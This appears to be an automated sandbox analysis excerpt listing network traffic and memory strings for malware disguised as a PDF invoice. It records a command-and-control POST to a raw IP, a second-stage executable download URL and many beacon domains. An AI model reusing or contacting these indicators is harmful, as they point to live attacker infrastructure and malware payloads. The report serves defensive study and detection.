Source: global traffic	DNS traffic detected: DNS query: www.mcapitalparticipacoes.com
Source: global traffic	DNS traffic detected: DNS query: www.top-dao.com
Source: global traffic	DNS traffic detected: DNS query: www.jasonnutter.golf
Source: global traffic	DNS traffic detected: DNS query: www.cataclysmicgamingapparel.com

Source: unknown

HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 172Connection: close

Source: RegSvcs.exe, 0000000F.00000002.3743055892.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3739899679.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://45.61.137.215/index.php/3b1tenbkyj
Source: explorer.exe, 00000014.00000000.1348137626.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000014.00000000.1348137626.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000014.00000000.1348137626.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mbsngradnja.com
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mbsngradnja.com/YLc7afPlL4RjCeK.exe
Source: explorer.exe, 00000014.00000000.1348137626.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000014.00000002.3756715275.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.3755615297.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1337250517.0000000002C60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, YLc7afPlL4RjCeK.exe, 0000000E.00000002.1334933254.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: YLc7afPlL4RjCeK.exe, 0000000E.00000000.1314951505.0000000000C55000.00000002.00000001.01000000.0000000C.sdmp, Ajanlatkeres_2024.05.29.PDF.exe, YLc7afPlL4RjCeK.exe.6.dr	String found in binary or memory: http://tempuri.org/studentDataSet.xsd9MenuTry.Properties.Resources
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.banditsolana.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.banditsolana.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.banditsolana.com/dn03/www.mcapitalparticipacoes.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.banditsolana.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bx2zyg.com
Source: explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bx2zyg.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bx2zyg.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cataclysmicgamingapparel.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cataclysmicgamingapparel.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cataclysmicgamingapparel.com/dn03/www.cyberxdefend.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cataclysmicgamingapparel.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cyberxdefend.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cyberxdefend.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cyberxdefend.com/dn03/www.ioco.in
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cyberxdefend.comReferer:
Source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.imdcaam.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.imdcaam.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.imdcaam.com/dn03/www.lovedacademy.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.imdcaam.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ioco.in
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ioco.in/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ioco.in/dn03/www.numericalsemantics.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ioco.inReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jasonnutter.golf
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jasonnutter.golf/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jasonnutter.golf/dn03/www.verxop.xyz
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jasonnutter.golfReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lovedacademy.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lovedacademy.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lovedacademy.com/dn03/www.vivaness.club
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lovedacademy.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mcapitalparticipacoes.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mcapitalparticipacoes.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mcapitalparticipacoes.com/dn03/www.top-dao.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mcapitalparticipacoes.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.numericalsemantics.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.numericalsemantics.com/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.numericalsemantics.com/dn03/www.bx2zyg.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.numericalsemantics.comReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.servicepmgtl.world
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.servicepmgtl.world/dn03/
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.servicepmgtl.world/dn03/www.sukhiclothing.com
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.servicepmgtl.worldReferer:
Source: explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sukhiclothing.com
